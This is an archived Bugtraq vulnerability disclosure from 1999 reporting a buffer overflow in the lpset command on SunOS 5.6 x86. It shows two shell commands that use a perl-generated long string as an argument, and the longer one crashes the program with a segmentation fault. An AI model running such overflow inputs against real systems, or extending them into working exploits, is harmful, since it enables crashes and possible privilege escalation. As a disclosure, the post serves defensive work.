Bugtraq mailing list archives

SunOS 5.6 (X86) lpset vulnerability


From: bugscan () KOSNET NET (kim yong-jun homepage=ce.hannam.ac.kr/~s96192)
Date: Tue, 11 May 1999 11:43:46 +0900


This is my second post to ButTraq.
If  this is old, I'm sorry.


It's buffer overflow in "/usr/bin/lpset".

View this command :
[loveyou@/] % /usr/bin/lpset -a key=`perl  -e 'print "x" x 1006'` loveyou

[loveyou@/] % /usr/bin/lpset -a key=`perl  -e 'print "x" x 1007'` loveyou
Segmentation fault

:)

byebye..

-------------------------------------------------------------<
  Loveyou's World
  Yong-Jun , Kim ( bugscan () kosnet net )                                      
  Network Engineer
-------------------------------------------------------------<



Current thread: